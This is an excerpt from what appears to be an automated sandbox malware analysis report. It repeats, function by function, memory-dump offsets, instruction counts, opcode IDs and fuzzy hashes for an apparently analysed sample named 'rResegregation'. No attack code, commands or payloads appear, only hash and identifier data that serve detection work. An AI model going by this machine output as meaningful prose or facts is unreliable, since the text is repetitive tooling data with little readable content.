                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 471b739939f6b1e3f221fde2edb17b01a4ec352395876090ad5d8b3099e682e4
                                                                  • Instruction ID: cdba5769078d8cee4d18bcda1d56088a5fa0c463942c8fd1c214b704b20b3017
                                                                  • Opcode Fuzzy Hash: 471b739939f6b1e3f221fde2edb17b01a4ec352395876090ad5d8b3099e682e4
                                                                  • Instruction Fuzzy Hash: 44115E71A01249EFDB00CFA9C945E9EBBF8EF44714F104066F900EB380D678DA01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EE4EF Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ee53c0bd638f7b52c218391e7a2fa73aa36885d6519d57198e5500b67b99ba36
                                                                  • Instruction ID: 2d8a7ea7393a2685a74ea843e0ce0a2d3a01b49626da3af8412d8a7aa63992ce
                                                                  • Opcode Fuzzy Hash: ee53c0bd638f7b52c218391e7a2fa73aa36885d6519d57198e5500b67b99ba36
                                                                  • Instruction Fuzzy Hash: FE01DFB1200A45BFC3109F69CC88E53B7ACEF99764F000125F1088B960DB28EC02CAA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783C691 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 383bd81158dc5141237e36e12670bd135b73cdbb0fabb62e8d824a6050834303
                                                                  • Instruction ID: b75749a45d4914495c23f59d699db9d3ce68ea5acaf6cdb11da96ff00550483f
                                                                  • Opcode Fuzzy Hash: 383bd81158dc5141237e36e12670bd135b73cdbb0fabb62e8d824a6050834303
                                                                  • Instruction Fuzzy Hash: 0B1179B56193049FC300CF6DC445A5BBBE8EF98710F00891EF958DB390E634E900CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 37884600 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                  • Instruction ID: c6f3d7ae116f7adabb375cc28ec0f4f86cee5d3436d99a711f0a11e3dd9b3362
                                                                  • Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                  • Instruction Fuzzy Hash: 5101B1B7200601AFE721CE65D840F96B3EAFBD5350F544559E55A8B650DA74F880CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783C5FC Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: deb040409c987e695421159860cce388eee2fef81fd78f91640ba52c9e5cb6d8
                                                                  • Instruction ID: f2afa47f606c482a4dd5ef8b9c00fe433febe505463414d7f8e99fc7072ee341
                                                                  • Opcode Fuzzy Hash: deb040409c987e695421159860cce388eee2fef81fd78f91640ba52c9e5cb6d8
                                                                  • Instruction Fuzzy Hash: CB1179B16193049FC700CF69C445A5BBBE8EF98710F00891EF958DB391E634E900CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A9303 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                  • Instruction ID: 904b3c694d01b5ff04357195354e8affe417a64e63e5c9006ed4d261cd0d4de8
                                                                  • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                  • Instruction Fuzzy Hash: 8A118732850B02DFE7618F15C880B22B7F1FB58772F158869E5894E6A2C778E890CF10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F607 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b4d34623b56270e8c657cc4076bbcee27ec031a19340f85672c035d39486d4d
                                                                  • Instruction ID: 319b04a7374376590ab8c6075968c2b19e6ac3b9f3b543a828ade80f8fc11e2c
                                                                  • Opcode Fuzzy Hash: 4b4d34623b56270e8c657cc4076bbcee27ec031a19340f85672c035d39486d4d
                                                                  • Instruction Fuzzy Hash: 2E015271A51208AFDB04DFA9D94AFAEBBF8EF45714F404056F900EB380D678DA01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F582 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 395ff20484ddfd5a2e82eaa85ccccb74acc646c42fd905c9a87b170c9ba3c1ab
                                                                  • Instruction ID: e28a1557a0d5ddc258de7e0de106f6e061b042a1e2ec96921a5f2a7fb16bd20c
                                                                  • Opcode Fuzzy Hash: 395ff20484ddfd5a2e82eaa85ccccb74acc646c42fd905c9a87b170c9ba3c1ab
                                                                  • Instruction Fuzzy Hash: A9015271A11208AFDB14DFA9D94AFAEBBF8EF44714F404056F900EB380DA78DA01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F4FD Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b75a659139a43507ec558ccf2357a08a30000b74b048c100034c25d486b4a73
                                                                  • Instruction ID: f6e954edfa269cc6e859fe52180de940d3724c925ec0a58f128101b41e337b6f
                                                                  • Opcode Fuzzy Hash: 2b75a659139a43507ec558ccf2357a08a30000b74b048c100034c25d486b4a73
                                                                  • Instruction Fuzzy Hash: 09014C71A11208AFDB14DFA9D949FAEBBF8EF44714F004066F914EB380DA79DA01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F478 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15f46acd10109e5b6ce01417229c7989566156bb27ae43b43594b6b163686a79
                                                                  • Instruction ID: 9d0632b79dcd4e1203dbabfccaa6efe046f8b7aca1c51b502e1bd776db3cc25a
                                                                  • Opcode Fuzzy Hash: 15f46acd10109e5b6ce01417229c7989566156bb27ae43b43594b6b163686a79
                                                                  • Instruction Fuzzy Hash: F4014071A11248AFDB04DFA9D949EAEBBF8EF44714F004096F900EB381DA79DA01CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377D32C5 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                  • Instruction ID: d442b4dc78a656d2076d2f02547ad9e1a1c8483c589b118ceeac49681d85cdf2
                                                                  • Opcode Fuzzy Hash: a3dddedfdcda869455ebe0dd37e70cd22dcdb3d82042c335650c8ed2a961fe28
                                                                  • Instruction Fuzzy Hash: 7A01DC7A700605EBCB01CAAAEE04E9F37ACAF8C790F800429B915DF110DFB4E921C760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A821B Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63d242be9a8a1cb68dcbfb5efaa9fd99c346543266b7e2e262a764c86b9c367e
                                                                  • Instruction ID: ab0b2bf5318b45d71e6d6d6bc7b99f26eb0563efb108be0aa321946446f5c135
                                                                  • Opcode Fuzzy Hash: 63d242be9a8a1cb68dcbfb5efaa9fd99c346543266b7e2e262a764c86b9c367e
                                                                  • Instruction Fuzzy Hash: C001F775B05604EBE745DF6ED815ABEB7B9AF80760F104129D801EF780DF28EC06DA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E415F Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 59a4e8875ac763547554381ee04f728f9b95439c239b80480a6edca4da11eca7
                                                                  • Instruction ID: 8a0a5b7296c0e5b161985560e048c75a9aebbd24617cbe6b6ad4ff63b2c75378
                                                                  • Opcode Fuzzy Hash: 59a4e8875ac763547554381ee04f728f9b95439c239b80480a6edca4da11eca7
                                                                  • Instruction Fuzzy Hash: 9701267E200201EBC700CF7D8614669BBEDFB69324721092AF408CBF14C236F942D711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B24A2 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8a0593ef4cfeccb03c12dd66bfac506a952a32f9eaecc9bb5c4194605a1ed6d0
                                                                  • Instruction ID: 9d303042abab6507b858a713a4bac1478ca306e7bf094c264d3a3360574d7b98
                                                                  • Opcode Fuzzy Hash: 8a0593ef4cfeccb03c12dd66bfac506a952a32f9eaecc9bb5c4194605a1ed6d0
                                                                  • Instruction Fuzzy Hash: 25F0F932601750B7C731CF569C44F477BA9EB88BA0F104028F6099B640C634DC01D6E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F38A Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 109d07f0d84f3e2a0a9011fd32c2dded135fa14000bb11b9b0ebdcd6db7ebec6
                                                                  • Instruction ID: ade5c92d02a810f0d7945b16d5853983dbe2ace5e9517e79c2246a036f2a6e3c
                                                                  • Opcode Fuzzy Hash: 109d07f0d84f3e2a0a9011fd32c2dded135fa14000bb11b9b0ebdcd6db7ebec6
                                                                  • Instruction Fuzzy Hash: 3A018F71A10318EFDB10DBA9D949FAEBBB8EF94704F00406AF500EB381DA78D901CB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378792AB Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                  • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                  • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                  • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378851B6 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b423312c7312dbe3d2dc417204449e8aa2878024b287783dda5ed1c712b29f73
                                                                  • Instruction ID: c4f697af3140c1706c1e8540ba4d5226b2073e8c5bc9783d0c176d25696632b1
                                                                  • Opcode Fuzzy Hash: b423312c7312dbe3d2dc417204449e8aa2878024b287783dda5ed1c712b29f73
                                                                  • Instruction Fuzzy Hash: AB116D78D50259EFCB04DFA8D545AAEBBB4EF18704F14805AF814EB381EB34EA02CB55
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E5654 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                  • Instruction ID: e2e7abd6e543bc088a289acf833601170fb0cee4c7bb562abea740a1e12d8e96
                                                                  • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                  • Instruction Fuzzy Hash: 04F0FFB2A01218AFE309CF5CCC40F5AB7EDEB45BA4F014069E500DF221E672EE04CA94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AC2B0 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                  • Instruction ID: 9d2cdd5f6713dcfd4c0a29de30ba7040b6414a90209b0a2bf420b196bf1ad17d
                                                                  • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                  • Instruction Fuzzy Hash: FAF0F673240722FBF3724ADD4848B5B7AEA9FD5A70F160235E505BF780CE648C1296D6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783D4A0 Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 58f5893110eba3908506b5698128d2529a469325aa3471aebb9952bd2c5eb771
                                                                  • Instruction ID: c568a88d112cdaf926bf784eeb49ac883d1ffdd5c0e84490a2f16d3523af5155
                                                                  • Opcode Fuzzy Hash: 58f5893110eba3908506b5698128d2529a469325aa3471aebb9952bd2c5eb771
                                                                  • Instruction Fuzzy Hash: D9F046363419816BDA21AFA89D58F1A3619EBE5B54F100429F2052F6E0DF1CDC01C692
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F30A Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9bacc663e54032ac6836e679a4d8638b1584f3cb5b65b11de894f0ab9a42d8a
                                                                  • Instruction ID: c90f0ec22b1c05a075bc80443fe29221dbd5833710d46cef77f9895d7aaf4d74
                                                                  • Opcode Fuzzy Hash: b9bacc663e54032ac6836e679a4d8638b1584f3cb5b65b11de894f0ab9a42d8a
                                                                  • Instruction Fuzzy Hash: 2401E9B4E00309EFDB04DFA9D545AAEBBF4AF08704F108069E915EB381E674DA00CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3786F409 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79af27de57341d59cdc2a092671314128847faeadd4d68c0930c9d9240e7739f
                                                                  • Instruction ID: 58f67a4bee010cd174d45d4ef1bc41ee212dec258a5ab0efb25b48eec9cb6497
                                                                  • Opcode Fuzzy Hash: 79af27de57341d59cdc2a092671314128847faeadd4d68c0930c9d9240e7739f
                                                                  • Instruction Fuzzy Hash: F8F0A471A10318AFD704DFB9C909AAEB7B8EF49714F00809AF510FB280DA74D9018751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E716D Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                  • Instruction ID: 17bd0623bc2cbc9feb611329c0f25f5ac25e17759ba918b933b3586ebcecc6b5
                                                                  • Opcode Fuzzy Hash: d9094b8c0e0c6258773a4d94f691f5c07bcccd706a453715036b0034c324f6df
                                                                  • Instruction Fuzzy Hash: 55F0FC76A05354AFEB04CBA58840FEE7BAD9FC0760F004C59DD019F680D734E941C6D0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E648A Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9b59ffe5fe3eed2c1e0782354f8b516c1f368e17f0969c959ba5698a3381536
                                                                  • Instruction ID: 99033fe3b3a49bd641369ec80190dcbf5f06541d8fe391f43655bb31c80c36d4
                                                                  • Opcode Fuzzy Hash: b9b59ffe5fe3eed2c1e0782354f8b516c1f368e17f0969c959ba5698a3381536
                                                                  • Instruction Fuzzy Hash: 57018174342780DFF3268B28CD49F2537ADAB11B60F544490E914DFAD2EB2CD940C221
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378832C9 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
